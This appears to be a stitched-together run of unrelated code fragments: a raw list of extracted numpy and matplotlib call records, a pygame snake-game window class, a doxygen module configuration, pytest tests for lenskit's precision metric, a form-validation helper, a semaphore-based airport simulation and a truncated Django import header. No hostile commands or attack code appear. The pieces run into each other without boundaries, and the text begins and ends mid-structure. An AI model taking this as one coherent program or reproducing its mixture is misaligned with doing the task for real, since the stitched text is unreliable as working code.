(12964, 12977), True, 'import matplotlib.pyplot as plt\n'), ((14447, 14475), 'colorsys.hls_to_rgb', 'colorsys.hls_to_rgb', (['h', 'l', 's'], {}), '(h, l, s)\n', (14466, 14475), False, 'import colorsys\n'), ((2449, 2513), 'os.path.join', 'os.path.join', (['"""../experiments/automl_plots/"""', "(file_name + '.png')"], {}), "('../experiments/automl_plots/', file_name + '.png')\n", (2461, 2513), False, 'import os\n'), ((8334, 8345), 'numpy.zeros', 'np.zeros', (['n'], {}), '(n)\n', (8342, 8345), True, 'import numpy as np\n'), ((8359, 8370), 'numpy.zeros', 'np.zeros', (['n'], {}), '(n)\n', (8367, 8370), True, 'import numpy as np\n'), ((8386, 8397), 'numpy.zeros', 'np.zeros', (['n'], {}), '(n)\n', (8394, 8397), True, 'import numpy as np\n'), ((8415, 8431), 'numpy.zeros', 'np.zeros', (['[n, 3]'], {}), '([n, 3])\n', (8423, 8431), True, 'import numpy as np\n'), ((12723, 12792), 'matplotlib.pyplot.scatter', 'plt.scatter', (['xs', 'ys'], {'s': 'rads', 'c': 'colors', 'alpha': 'alpha', 'edgecolors': '"""none"""'}), "(xs, ys, s=rads, c=colors, alpha=alpha, edgecolors='none')\n", (12734, 12792), True, 'import matplotlib.pyplot as plt\n'), ((12851, 12867), 'numpy.arange', 'np.arange', (['index'], {}), '(index)\n', (12860, 12867), True, 'import numpy as np\n'), ((13878, 13899), 'numpy.array', 'np.array', (['[[1, 0, 0]]'], {}), '([[1, 0, 0]])\n', (13886, 13899), True, 'import numpy as np\n'), ((14412, 14427), 'random.random', 'random.random', ([], {}), '()\n', (14425, 14427), False, 'import random\n'), ((4560, 4579), 'math.isfinite', 'math.isfinite', (['x[0]'], {}), '(x[0])\n', (4573, 4579), False, 'import math\n'), ((6716, 6747), 'matplotlib.pyplot.semilogx', 'plt.semilogx', (['x', 'y'], {'color': 'color'}), '(x, y, color=color)\n', (6728, 6747), True, 'import matplotlib.pyplot as plt\n'), ((4834, 4858), 'math.isfinite', 'math.isfinite', (['lut[i][0]'], {}), '(lut[i][0])\n', (4847, 4858), False, 'import math\n'), ((14020, 14041), 'numpy.array', 'np.array', (['[[1, 0, 0]]'], {}), '([[1, 0, 0]])\n', (14028, 14041), True, 'import numpy as np\n'), ((14343, 14364), 'numpy.array', 'np.array', (['[[0, 1, 0]]'], {}), '([[0, 1, 0]])\n', (14351, 14364), True, 'import numpy as np\n'), ((4180, 4195), 'numpy.mean', 'np.mean', (['losses'], {}), '(losses)\n', (4187, 4195), True, 'import numpy as np\n'), ((4197, 4211), 'numpy.std', 'np.std', (['losses'], {}), '(losses)\n', (4203, 4211), True, 'import numpy as np\n'), ((14054, 14075), 'numpy.array', 
'np.array', (['[[0, 1, 0]]'], {}), '([[0, 1, 0]])\n', (14062, 14075), True, 'import numpy as np\n'), ((14203, 14224), 'numpy.array', 'np.array', (['[[1, 1, 0]]'], {}), '([[1, 1, 0]])\n', (14211, 14224), True, 'import numpy as np\n'), ((14245, 14267), 'numpy.array', 'np.array', (['[[-1, 0, 0]]'], {}), '([[-1, 0, 0]])\n', (14253, 14267), True, 'import numpy as np\n'), ((9095, 9105), 'numpy.log', 'np.log', (['ep'], {}), '(ep)\n', (9101, 9105), True, 'import numpy as np\n'), ((9107, 9119), 'numpy.log', 'np.log', (['ep_m'], {}), '(ep_m)\n', (9113, 9119), True, 'import numpy as np\n'), ((9121, 9133), 'numpy.log', 'np.log', (['ep_M'], {}), '(ep_M)\n', (9127, 9133), True, 'import numpy as np\n'), ((9641, 9673), 'numpy.random.uniform', 'np.random.uniform', (['(-x_dev)', 'x_dev'], {}), '(-x_dev, x_dev)\n', (9658, 9673), True, 'import numpy as np\n'), ((9718, 9750), 'numpy.random.uniform', 'np.random.uniform', (['(-y_dev)', 'y_dev'], {}), '(-y_dev, y_dev)\n', (9735, 9750), True, 'import numpy as np\n'), ((10179, 10211), 'numpy.random.uniform', 'np.random.uniform', (['(-x_dev)', 'x_dev'], {}), '(-x_dev, x_dev)\n', (10196, 10211), True, 'import numpy as np\n'), ((10276, 10308), 'numpy.random.uniform', 'np.random.uniform', (['(-y_dev)', 'y_dev'], {}), '(-y_dev, y_dev)\n', (10293, 10308), True, 'import numpy as np\n'), ((11173, 11205), 'numpy.random.uniform', 'np.random.uniform', (['(-x_dev)', 'x_dev'], {}), '(-x_dev, x_dev)\n', (11190, 11205), True, 'import numpy as np\n'), ((11270, 11302), 'numpy.random.uniform', 'np.random.uniform', (['(-y_dev)', 'y_dev'], {}), '(-y_dev, y_dev)\n', (11287, 11302), True, 'import numpy as np\n'), ((11526, 11541), 'numpy.log', 'np.log', (['min_val'], {}), '(min_val)\n', (11532, 11541), True, 'import numpy as np\n'), ((11544, 11559), 'numpy.log', 'np.log', (['max_val'], {}), '(max_val)\n', (11550, 11559), True, 'import numpy as np\n'), ((12411, 12427), 'decimal.Decimal', 'Decimal', (['min_val'], {}), '(min_val)\n', (12418, 12427), False, 'from decimal import Decimal\n'), ((12537, 12552), 'decimal.Decimal', 'Decimal', (['val050'], {}), '(val050)\n', (12544, 12552), False, 'from decimal import Decimal\n'), ((12660, 12676), 'decimal.Decimal', 'Decimal', (['max_val'], {}), '(max_val)\n', (12667, 12676), False, 'from decimal import Decimal\n'), ((10630, 10646), 'decimal.Decimal', 'Decimal', (['min_val'], {}), '(min_val)\n', (10637, 10646), False, 'from decimal import Decimal\n'), ((10758, 10774), 'decimal.Decimal', 'Decimal', (['max_val'], {}), '(max_val)\n', (10765, 10774), False, 'from decimal import Decimal\n'), ((11754, 11786), 'numpy.random.uniform', 'np.random.uniform', (['(-x_dev)', 'x_dev'], {}), '(-x_dev, x_dev)\n', (11771, 11786), True, 'import numpy as np\n'), ((11844, 11862), 'numpy.log', 'np.log', (['data[k][0]'], {}), '(data[k][0])\n', (11850, 11862), True, 'import numpy as np\n'), ((11864, 11879), 'numpy.log', 'np.log', (['min_val'], {}), '(min_val)\n', (11870, 11879), True, 'import numpy as np\n'), ((11881, 11896), 'numpy.log', 'np.log', (['max_val'], {}), '(max_val)\n', (11887, 11896), True, 'import numpy as np\n'), ((12214, 12246), 'numpy.random.uniform', 'np.random.uniform', (['(-x_dev)', 'x_dev'], {}), '(-x_dev, x_dev)\n', (12231, 12246), True, 'import numpy as np\n')]
|
import pygame, sys
from typing import List, Tuple
import time
from pygame.math import Vector2
from .snake import Snake
from .eatable.mouse import Mouse
from .model import Model
from .eatable.sandglass import Sandglass
from .eatable.peel import Peel
from .components import sound_controller
from .eatable.saw import Saw
from .components.background import Background
from .config import FPS, xSize, ySize, SPEED
from .components.score import Score
from .noneatable.bush import Bush
class GUI(object):
def __init__(self) -> None:
        # Window setup
self.screen = pygame.display.set_mode((xSize,ySize))
#print(type(screen))
self.SCREEN_UPDATE = pygame.USEREVENT
self.clock = pygame.time.Clock()
# Initialize pygame
pygame.mixer.pre_init(44100,-16,2,512)
pygame.init()
pygame.time.set_timer(self.SCREEN_UPDATE, SPEED)
        # Create the game objects
self.snake = Snake(self.screen)
        # Background
self.background = Background(self.screen)
# Powerups
self.sandglass = Sandglass(self.screen)
self.saw = Saw(self.screen)
self.peel = Peel(self.screen)
# Score
self.score = Score(self.screen)
self.barrier_list = []
self.food_list = []
        # Game logic
self.model = Model(self.screen, self.snake, self.sandglass, self.saw, self.score, self.food_list, self.barrier_list, self.peel)
# Speed Up
self.speedup = False
def update(self) -> None:
        self.model.update_snake() # set the snake in motion
        self.model.check_collision() # collision check: snake with mouse
        self.model.check_fail() # collision check: snake with itself
self.model.update_barriers()
def draw_elements(self) -> None:
self.background.draw_background()
        self.snake.draw_snake() # draw the snake
for barrier in self.barrier_list:
barrier.draw_barrier()
        for obj in self.food_list: # draw the mice
obj.draw_food()
self.score.draw_score()
    # Main loop
def update_display(self) -> None:
for event in pygame.event.get():
            if event.type == pygame.QUIT: # close the window
pygame.quit()
sys.exit()
if event.type == self.SCREEN_UPDATE:
                self.update() # update the game-element logic
            if event.type == pygame.KEYDOWN: # handle snake steering input
self.model.change_direction(event)
        self.draw_elements() # draw all static objects
        pygame.display.update() # update the display
|
[
"pygame.quit",
"pygame.event.get",
"pygame.display.set_mode",
"pygame.mixer.pre_init",
"pygame.init",
"pygame.display.update",
"pygame.time.Clock",
"pygame.time.set_timer",
"sys.exit"
] |
[((584, 623), 'pygame.display.set_mode', 'pygame.display.set_mode', (['(xSize, ySize)'], {}), '((xSize, ySize))\n', (607, 623), False, 'import pygame, sys\n'), ((720, 739), 'pygame.time.Clock', 'pygame.time.Clock', ([], {}), '()\n', (737, 739), False, 'import pygame, sys\n'), ((777, 818), 'pygame.mixer.pre_init', 'pygame.mixer.pre_init', (['(44100)', '(-16)', '(2)', '(512)'], {}), '(44100, -16, 2, 512)\n', (798, 818), False, 'import pygame, sys\n'), ((824, 837), 'pygame.init', 'pygame.init', ([], {}), '()\n', (835, 837), False, 'import pygame, sys\n'), ((846, 894), 'pygame.time.set_timer', 'pygame.time.set_timer', (['self.SCREEN_UPDATE', 'SPEED'], {}), '(self.SCREEN_UPDATE, SPEED)\n', (867, 894), False, 'import pygame, sys\n'), ((2295, 2313), 'pygame.event.get', 'pygame.event.get', ([], {}), '()\n', (2311, 2313), False, 'import pygame, sys\n'), ((2815, 2838), 'pygame.display.update', 'pygame.display.update', ([], {}), '()\n', (2836, 2838), False, 'import pygame, sys\n'), ((2404, 2417), 'pygame.quit', 'pygame.quit', ([], {}), '()\n', (2415, 2417), False, 'import pygame, sys\n'), ((2434, 2444), 'sys.exit', 'sys.exit', ([], {}), '()\n', (2442, 2444), False, 'import pygame, sys\n')]
|
#!/usr/bin/python
import os
import doxy.module as module
import doxy.debug as debug
import doxy.tools as tools
def create(target, module_name):
my_module = module.Module(__file__, module_name)
my_module.set_version("version.txt")
my_module.set_title("$N gesture recognition")
my_module.set_website("http://atria-soft.github.io/" + module_name)
my_module.set_website_sources("http://github.com/atria-soft/" + module_name)
my_module.add_path([
module_name,
"doc"
])
my_module.add_depend([
'elog',
'etk',
'ejson',
'esvg',
'ememory',
])
my_module.add_exclude_symbols([
'*operator<<*',
])
my_module.add_exclude_file([
'debug.hpp',
])
my_module.add_file_patterns([
'*.hpp',
'*.md',
])
my_module.add_module_define([
"PARSE_DOXYGEN",
])
return my_module
|
[
"doxy.module.Module"
] |
[((158, 194), 'doxy.module.Module', 'module.Module', (['__file__', 'module_name'], {}), '(__file__, module_name)\n', (171, 194), True, 'import doxy.module as module\n')]
|
import numpy as np
import pandas as pd
from pytest import approx
from lenskit.topn import precision
from lenskit.util.test import demo_recs
from lenskit import topn
def _test_prec(items, rel, **k):
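    # Helper: wrap the recs/truth lists in DataFrames and delegate to lenskit's precision metric.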
recs = pd.DataFrame({'item': items})
truth = pd.DataFrame({'item': rel}).set_index('item')
return precision(recs, truth, **k)
def test_precision_empty_none():
prec = _test_prec([], [1, 3])
assert prec is None
def test_precision_simple_cases():
prec = _test_prec([1, 3], [1, 3])
assert prec == approx(1.0)
prec = _test_prec([1], [1, 3])
assert prec == approx(1.0)
prec = _test_prec([1, 2, 3, 4], [1, 3])
assert prec == approx(0.5)
prec = _test_prec([1, 2, 3, 4], [1, 3, 5])
assert prec == approx(0.5)
prec = _test_prec([1, 2, 3, 4], range(5, 10))
assert prec == approx(0.0)
prec = _test_prec([1, 2, 3, 4], range(4, 10))
assert prec == approx(0.25)
def test_precision_series():
prec = _test_prec(pd.Series([1, 3]), pd.Series([1, 3]))
assert prec == approx(1.0)
prec = _test_prec(pd.Series([1, 2, 3, 4]), pd.Series([1, 3, 5]))
assert prec == approx(0.5)
prec = _test_prec(pd.Series([1, 2, 3, 4]), pd.Series(range(4, 10)))
assert prec == approx(0.25)
def test_precision_series_set():
prec = _test_prec(pd.Series([1, 2, 3, 4]), [1, 3, 5])
assert prec == approx(0.5)
prec = _test_prec(pd.Series([1, 2, 3, 4]), range(4, 10))
assert prec == approx(0.25)
def test_precision_series_index():
prec = _test_prec(pd.Series([1, 3]), pd.Index([1, 3]))
assert prec == approx(1.0)
prec = _test_prec(pd.Series([1, 2, 3, 4]), pd.Index([1, 3, 5]))
assert prec == approx(0.5)
prec = _test_prec(pd.Series([1, 2, 3, 4]), pd.Index(range(4, 10)))
assert prec == approx(0.25)
def test_precision_series_array():
prec = _test_prec(pd.Series([1, 3]), np.array([1, 3]))
assert prec == approx(1.0)
prec = _test_prec(pd.Series([1, 2, 3, 4]), np.array([1, 3, 5]))
assert prec == approx(0.5)
prec = _test_prec(pd.Series([1, 2, 3, 4]), np.arange(4, 10, 1, 'u4'))
assert prec == approx(0.25)
def test_precision_array():
prec = _test_prec(np.array([1, 3]), np.array([1, 3]))
assert prec == approx(1.0)
prec = _test_prec(np.array([1, 2, 3, 4]), np.array([1, 3, 5]))
assert prec == approx(0.5)
prec = _test_prec(np.array([1, 2, 3, 4]), np.arange(4, 10, 1, 'u4'))
assert prec == approx(0.25)
def test_prec_long_rel():
rel = np.arange(100)
items = [1, 0, 150, 3, 10]
r = _test_prec(items, rel, k=5)
assert r == approx(0.8)
def test_prec_long_items():
rel = np.arange(100)
items = [1, 0, 150, 3, 10, 30, 120, 4, 17]
r = _test_prec(items, rel, k=5)
assert r == approx(0.8)
def test_prec_short_items():
rel = np.arange(100)
items = [1, 0, 150]
r = _test_prec(items, rel, k=5)
assert r == approx(2 / 3)
def test_recall_bulk_k(demo_recs):
"bulk and normal match"
train, test, recs = demo_recs
assert test['user'].value_counts().max() > 5
rla = topn.RecListAnalysis()
rla.add_metric(precision, name='pk', k=5)
rla.add_metric(precision)
# metric without the bulk capabilities
rla.add_metric(lambda *a, **k: precision(*a, **k), name='ind_pk', k=5)
rla.add_metric(lambda *a: precision(*a), name='ind_p')
res = rla.compute(recs, test)
assert res.precision.values == approx(res.ind_p.values)
assert res.pk.values == approx(res.ind_pk.values)
|
[
"pandas.DataFrame",
"pandas.Index",
"numpy.arange",
"pandas.Series",
"numpy.array",
"lenskit.topn.precision",
"lenskit.topn.RecListAnalysis",
"pytest.approx"
] |
[((213, 242), 'pandas.DataFrame', 'pd.DataFrame', (["{'item': items}"], {}), "({'item': items})\n", (225, 242), True, 'import pandas as pd\n'), ((312, 339), 'lenskit.topn.precision', 'precision', (['recs', 'truth'], {}), '(recs, truth, **k)\n', (321, 339), False, 'from lenskit.topn import precision\n'), ((2499, 2513), 'numpy.arange', 'np.arange', (['(100)'], {}), '(100)\n', (2508, 2513), True, 'import numpy as np\n'), ((2650, 2664), 'numpy.arange', 'np.arange', (['(100)'], {}), '(100)\n', (2659, 2664), True, 'import numpy as np\n'), ((2818, 2832), 'numpy.arange', 'np.arange', (['(100)'], {}), '(100)\n', (2827, 2832), True, 'import numpy as np\n'), ((3083, 3105), 'lenskit.topn.RecListAnalysis', 'topn.RecListAnalysis', ([], {}), '()\n', (3103, 3105), False, 'from lenskit import topn\n'), ((527, 538), 'pytest.approx', 'approx', (['(1.0)'], {}), '(1.0)\n', (533, 538), False, 'from pytest import approx\n'), ((594, 605), 'pytest.approx', 'approx', (['(1.0)'], {}), '(1.0)\n', (600, 605), False, 'from pytest import approx\n'), ((670, 681), 'pytest.approx', 'approx', (['(0.5)'], {}), '(0.5)\n', (676, 681), False, 'from pytest import approx\n'), ((749, 760), 'pytest.approx', 'approx', (['(0.5)'], {}), '(0.5)\n', (755, 760), False, 'from pytest import approx\n'), ((831, 842), 'pytest.approx', 'approx', (['(0.0)'], {}), '(0.0)\n', (837, 842), False, 'from pytest import approx\n'), ((913, 925), 'pytest.approx', 'approx', (['(0.25)'], {}), '(0.25)\n', (919, 925), False, 'from pytest import approx\n'), ((979, 996), 'pandas.Series', 'pd.Series', (['[1, 3]'], {}), '([1, 3])\n', (988, 996), True, 'import pandas as pd\n'), ((998, 1015), 'pandas.Series', 'pd.Series', (['[1, 3]'], {}), '([1, 3])\n', (1007, 1015), True, 'import pandas as pd\n'), ((1036, 1047), 'pytest.approx', 'approx', (['(1.0)'], {}), '(1.0)\n', (1042, 1047), False, 'from pytest import approx\n'), ((1071, 1094), 'pandas.Series', 'pd.Series', (['[1, 2, 3, 4]'], {}), '([1, 2, 3, 4])\n', (1080, 1094), True, 'import pandas as pd\n'), ((1096, 1116), 'pandas.Series', 'pd.Series', (['[1, 3, 5]'], {}), '([1, 3, 5])\n', (1105, 1116), True, 'import pandas as pd\n'), ((1137, 1148), 'pytest.approx', 'approx', (['(0.5)'], {}), '(0.5)\n', (1143, 1148), False, 'from pytest import approx\n'), ((1172, 1195), 'pandas.Series', 'pd.Series', (['[1, 2, 3, 4]'], {}), '([1, 2, 3, 4])\n', (1181, 1195), True, 'import pandas as pd\n'), ((1241, 1253), 'pytest.approx', 'approx', (['(0.25)'], {}), '(0.25)\n', (1247, 1253), False, 'from pytest import approx\n'), ((1311, 1334), 'pandas.Series', 'pd.Series', (['[1, 2, 3, 4]'], {}), '([1, 2, 3, 4])\n', (1320, 1334), True, 'import pandas as pd\n'), ((1366, 1377), 'pytest.approx', 'approx', (['(0.5)'], {}), '(0.5)\n', (1372, 1377), False, 'from pytest import approx\n'), ((1401, 1424), 'pandas.Series', 'pd.Series', (['[1, 2, 3, 4]'], {}), '([1, 2, 3, 4])\n', (1410, 1424), True, 'import pandas as pd\n'), ((1459, 1471), 'pytest.approx', 'approx', (['(0.25)'], {}), '(0.25)\n', (1465, 1471), False, 'from pytest import approx\n'), ((1531, 1548), 'pandas.Series', 'pd.Series', (['[1, 3]'], {}), '([1, 3])\n', (1540, 1548), True, 'import pandas as pd\n'), ((1550, 1566), 'pandas.Index', 'pd.Index', (['[1, 3]'], {}), '([1, 3])\n', (1558, 1566), True, 'import pandas as pd\n'), ((1587, 1598), 'pytest.approx', 'approx', (['(1.0)'], {}), '(1.0)\n', (1593, 1598), False, 'from pytest import approx\n'), ((1622, 1645), 'pandas.Series', 'pd.Series', (['[1, 2, 3, 4]'], {}), '([1, 2, 3, 4])\n', (1631, 1645), True, 'import pandas as pd\n'), ((1647, 
1666), 'pandas.Index', 'pd.Index', (['[1, 3, 5]'], {}), '([1, 3, 5])\n', (1655, 1666), True, 'import pandas as pd\n'), ((1687, 1698), 'pytest.approx', 'approx', (['(0.5)'], {}), '(0.5)\n', (1693, 1698), False, 'from pytest import approx\n'), ((1722, 1745), 'pandas.Series', 'pd.Series', (['[1, 2, 3, 4]'], {}), '([1, 2, 3, 4])\n', (1731, 1745), True, 'import pandas as pd\n'), ((1790, 1802), 'pytest.approx', 'approx', (['(0.25)'], {}), '(0.25)\n', (1796, 1802), False, 'from pytest import approx\n'), ((1862, 1879), 'pandas.Series', 'pd.Series', (['[1, 3]'], {}), '([1, 3])\n', (1871, 1879), True, 'import pandas as pd\n'), ((1881, 1897), 'numpy.array', 'np.array', (['[1, 3]'], {}), '([1, 3])\n', (1889, 1897), True, 'import numpy as np\n'), ((1918, 1929), 'pytest.approx', 'approx', (['(1.0)'], {}), '(1.0)\n', (1924, 1929), False, 'from pytest import approx\n'), ((1953, 1976), 'pandas.Series', 'pd.Series', (['[1, 2, 3, 4]'], {}), '([1, 2, 3, 4])\n', (1962, 1976), True, 'import pandas as pd\n'), ((1978, 1997), 'numpy.array', 'np.array', (['[1, 3, 5]'], {}), '([1, 3, 5])\n', (1986, 1997), True, 'import numpy as np\n'), ((2018, 2029), 'pytest.approx', 'approx', (['(0.5)'], {}), '(0.5)\n', (2024, 2029), False, 'from pytest import approx\n'), ((2053, 2076), 'pandas.Series', 'pd.Series', (['[1, 2, 3, 4]'], {}), '([1, 2, 3, 4])\n', (2062, 2076), True, 'import pandas as pd\n'), ((2078, 2103), 'numpy.arange', 'np.arange', (['(4)', '(10)', '(1)', '"""u4"""'], {}), "(4, 10, 1, 'u4')\n", (2087, 2103), True, 'import numpy as np\n'), ((2124, 2136), 'pytest.approx', 'approx', (['(0.25)'], {}), '(0.25)\n', (2130, 2136), False, 'from pytest import approx\n'), ((2189, 2205), 'numpy.array', 'np.array', (['[1, 3]'], {}), '([1, 3])\n', (2197, 2205), True, 'import numpy as np\n'), ((2207, 2223), 'numpy.array', 'np.array', (['[1, 3]'], {}), '([1, 3])\n', (2215, 2223), True, 'import numpy as np\n'), ((2244, 2255), 'pytest.approx', 'approx', (['(1.0)'], {}), '(1.0)\n', (2250, 2255), False, 'from pytest import approx\n'), ((2279, 2301), 'numpy.array', 'np.array', (['[1, 2, 3, 4]'], {}), '([1, 2, 3, 4])\n', (2287, 2301), True, 'import numpy as np\n'), ((2303, 2322), 'numpy.array', 'np.array', (['[1, 3, 5]'], {}), '([1, 3, 5])\n', (2311, 2322), True, 'import numpy as np\n'), ((2343, 2354), 'pytest.approx', 'approx', (['(0.5)'], {}), '(0.5)\n', (2349, 2354), False, 'from pytest import approx\n'), ((2378, 2400), 'numpy.array', 'np.array', (['[1, 2, 3, 4]'], {}), '([1, 2, 3, 4])\n', (2386, 2400), True, 'import numpy as np\n'), ((2402, 2427), 'numpy.arange', 'np.arange', (['(4)', '(10)', '(1)', '"""u4"""'], {}), "(4, 10, 1, 'u4')\n", (2411, 2427), True, 'import numpy as np\n'), ((2448, 2460), 'pytest.approx', 'approx', (['(0.25)'], {}), '(0.25)\n', (2454, 2460), False, 'from pytest import approx\n'), ((2598, 2609), 'pytest.approx', 'approx', (['(0.8)'], {}), '(0.8)\n', (2604, 2609), False, 'from pytest import approx\n'), ((2765, 2776), 'pytest.approx', 'approx', (['(0.8)'], {}), '(0.8)\n', (2771, 2776), False, 'from pytest import approx\n'), ((2910, 2923), 'pytest.approx', 'approx', (['(2 / 3)'], {}), '(2 / 3)\n', (2916, 2923), False, 'from pytest import approx\n'), ((3429, 3453), 'pytest.approx', 'approx', (['res.ind_p.values'], {}), '(res.ind_p.values)\n', (3435, 3453), False, 'from pytest import approx\n'), ((3482, 3507), 'pytest.approx', 'approx', (['res.ind_pk.values'], {}), '(res.ind_pk.values)\n', (3488, 3507), False, 'from pytest import approx\n'), ((255, 282), 'pandas.DataFrame', 'pd.DataFrame', (["{'item': rel}"], {}), 
"({'item': rel})\n", (267, 282), True, 'import pandas as pd\n'), ((3260, 3278), 'lenskit.topn.precision', 'precision', (['*a'], {}), '(*a, **k)\n', (3269, 3278), False, 'from lenskit.topn import precision\n'), ((3330, 3343), 'lenskit.topn.precision', 'precision', (['*a'], {}), '(*a)\n', (3339, 3343), False, 'from lenskit.topn import precision\n')]
|
import re
USERNAME_RE = re.compile(r"^[a-zA-Z0-9_-]{3,20}$")
PASSWORD_RE = re.compile(r"^.{3,20}$")
EMAIL_RE = re.compile(r'^[\S]+@[\S]+\.[\S]+$')
USERNAME_ERROR = "That's not a valid username."
PASSWORD_ERROR = "That wasn't a valid password."
V_PASSWORD_ERROR = "Your passwords didn't match."
EMAIL_ERROR = "That's not a valid email."
EXISTS_ERROR = "That user already exists"
LOGIN_ERROR = "Invalid login"
def chek_username(username):
return username and USERNAME_RE.match(username)
def chek_password(password):
return password and PASSWORD_RE.match(password)
def chek_email(email):
return not email or EMAIL_RE.match(email)
def is_notVerifyed(username, password, confirm, email, usermodel):
not_verifyed = False
kwargs = {'username': username,
'email': email}
if username in [user.username for user in usermodel.objects.all()]:#User.objects.get(username=username).username:
not_verifyed = True
kwargs["un_error"] = EXISTS_ERROR
elif not chek_username(username):
not_verifyed = True
kwargs['n_error'] = USERNAME_ERROR
if not chek_password(password):
not_verifyed = True
kwargs['p_error'] = PASSWORD_ERROR
elif password != confirm:
not_verifyed = True
kwargs['vp_error'] = V_PASSWORD_ERROR
if not chek_email(email):
not_verifyed = True
kwargs['e_error'] = EMAIL_ERROR
if not_verifyed:
return kwargs
# if not chek_username('111'):
# print "ne"
# if not chek_password('<PASSWORD>'):
# print 'pa'
# elif '111' != '111':
# print 'con'
# if not chek_email(''):
# print 'em'
# if USERNAME_RE.match('11'):
# print "re"
|
[
"re.compile"
] |
[((29, 64), 're.compile', 're.compile', (['"""^[a-zA-Z0-9_-]{3,20}$"""'], {}), "('^[a-zA-Z0-9_-]{3,20}$')\n", (39, 64), False, 'import re\n'), ((81, 104), 're.compile', 're.compile', (['"""^.{3,20}$"""'], {}), "('^.{3,20}$')\n", (91, 104), False, 'import re\n'), ((118, 156), 're.compile', 're.compile', (['"""^[\\\\S]+@[\\\\S]+\\\\.[\\\\S]+$"""'], {}), "('^[\\\\S]+@[\\\\S]+\\\\.[\\\\S]+$')\n", (128, 156), False, 'import re\n')]
|
from threading import Thread, Semaphore
from random import randint
from time import sleep
#global array to denote the airplanes in the air
planes = []
tracks = []
planes_landed = -1
passengersDownloaded = 0
mutex = Semaphore(1)         # protects the shared plane/passenger counters
ops = Semaphore(0)           # signals the operator that a plane has arrived
bus = Semaphore(0)           # wakes the bus once 10 passengers have been unloaded
landingTrack = Semaphore(0)  # released by the operator when a track may receive a plane
airplane = Semaphore(1)      # lets only one plane arrive at a time
busBarrier = Semaphore(0)    # declared but never used
class Passenger():
def __init__(self,id):
self.id = id
class Generator():
def __init__(self):
pass
def generatePassengers(self,n):
ps = []
for i in range(n):
p = Passenger(i)
ps.append(p)
return ps
class Plane():
g = Generator()
def __init__(self,id):
self.id = id
self.passengers = self.g.generatePassengers(randint(1,8))
self.fly()
def fly(self):
global planes_landed,planes
while True:
airplane.acquire()
print(self)
sleep(5)
with mutex:
if planes_landed < 5:
planes.append(self)
ops.release()
sleep(2)
def time_to_download(self):
time = 0
for p in self.passengers:
time_of_p = 0.4
time += (0.2 + time_of_p)
return time
def __str__(self):
return "Plane #" + str(self.id) + " is arriving with " + str(len(self.passengers)) + " passengers."
class Operator():
def __init__(self,id):
self.id = id
self.isAvailable = True
self.plane = None
self.work()
def work(self):
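        # Wait for an arriving plane, then assign it one of the four landing tracks if available.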
global planes,planes_landed
while True:
ops.acquire()
with mutex:
planes_landed += 1
p = planes[planes_landed]
if planes_landed < 4:
print("Operator is now attending plane #%d" % p.id)
sleep(2)
landingTrack.release()
else:
print("\tPlane %d must wait until a landing track is available..." % p.id)
with mutex:
planes_landed -= 1
with mutex:
if planes_landed < 5:
airplane.release()
class Track():
def __init__(self,id):
self.id = id
self.receivePlane()
def receivePlane(self):
global planes,planes_landed
while True:
landingTrack.acquire()
sleep(2)
with mutex:
plane = planes[planes_landed]
print("\tLanding track %d ready for plane %d's landing" % (self.id,plane.id))
self.attendPlane(plane)
def attendPlane(self,plane):
global planes_landed,passengersDownloaded
        print("\t\t\t\tPassengers are now downloading from plane %d" % plane.id)
for i in plane.passengers:
            print("\t\t\t\tPassenger %d is downloading from plane %d" % (i.id,plane.id))
sleep(1)
with mutex:
passengersDownloaded += 1
if passengersDownloaded == 10:
bus.release()
class Bus():
def __init__(self):
self.leaveWithPassengers()
def leaveWithPassengers(self):
global passengersDownloaded
while True:
bus.acquire()
print("\t\tBus is now leaving. We have %d passengers" % passengersDownloaded)
sleep(5)
print("\t\tArriving at terminal. %d passengers are going home." % passengersDownloaded)
passengersDownloaded = 0
if __name__ == '__main__':
num_planes = 5
num_tracks = 4
Thread(target=Operator,args=[0]).start()
Thread(target=Bus,args=[]).start()
for i in range(num_planes):
Thread(target=Plane,args=[i]).start()
for i in range(num_tracks):
Thread(target=Track,args=[i]).start()
|
[
"threading.Thread",
"threading.Semaphore",
"random.randint",
"time.sleep"
] |
[((219, 231), 'threading.Semaphore', 'Semaphore', (['(1)'], {}), '(1)\n', (228, 231), False, 'from threading import Thread, Semaphore\n'), ((238, 250), 'threading.Semaphore', 'Semaphore', (['(0)'], {}), '(0)\n', (247, 250), False, 'from threading import Thread, Semaphore\n'), ((257, 269), 'threading.Semaphore', 'Semaphore', (['(0)'], {}), '(0)\n', (266, 269), False, 'from threading import Thread, Semaphore\n'), ((285, 297), 'threading.Semaphore', 'Semaphore', (['(0)'], {}), '(0)\n', (294, 297), False, 'from threading import Thread, Semaphore\n'), ((309, 321), 'threading.Semaphore', 'Semaphore', (['(1)'], {}), '(1)\n', (318, 321), False, 'from threading import Thread, Semaphore\n'), ((335, 347), 'threading.Semaphore', 'Semaphore', (['(0)'], {}), '(0)\n', (344, 347), False, 'from threading import Thread, Semaphore\n'), ((914, 922), 'time.sleep', 'sleep', (['(2)'], {}), '(2)\n', (919, 922), False, 'from time import sleep\n'), ((687, 700), 'random.randint', 'randint', (['(1)', '(8)'], {}), '(1, 8)\n', (694, 700), False, 'from random import randint\n'), ((814, 822), 'time.sleep', 'sleep', (['(5)'], {}), '(5)\n', (819, 822), False, 'from time import sleep\n'), ((1930, 1938), 'time.sleep', 'sleep', (['(2)'], {}), '(2)\n', (1935, 1938), False, 'from time import sleep\n'), ((2355, 2363), 'time.sleep', 'sleep', (['(1)'], {}), '(1)\n', (2360, 2363), False, 'from time import sleep\n'), ((2702, 2710), 'time.sleep', 'sleep', (['(5)'], {}), '(5)\n', (2707, 2710), False, 'from time import sleep\n'), ((2893, 2926), 'threading.Thread', 'Thread', ([], {'target': 'Operator', 'args': '[0]'}), '(target=Operator, args=[0])\n', (2899, 2926), False, 'from threading import Thread, Semaphore\n'), ((2935, 2962), 'threading.Thread', 'Thread', ([], {'target': 'Bus', 'args': '[]'}), '(target=Bus, args=[])\n', (2941, 2962), False, 'from threading import Thread, Semaphore\n'), ((1526, 1534), 'time.sleep', 'sleep', (['(2)'], {}), '(2)\n', (1531, 1534), False, 'from time import sleep\n'), ((3001, 3031), 'threading.Thread', 'Thread', ([], {'target': 'Plane', 'args': '[i]'}), '(target=Plane, args=[i])\n', (3007, 3031), False, 'from threading import Thread, Semaphore\n'), ((3070, 3100), 'threading.Thread', 'Thread', ([], {'target': 'Track', 'args': '[i]'}), '(target=Track, args=[i])\n', (3076, 3100), False, 'from threading import Thread, Semaphore\n')]
|
import json
from django.core.serializers.json import DjangoJSONEncoder
from tastypie.serializers import Serializer
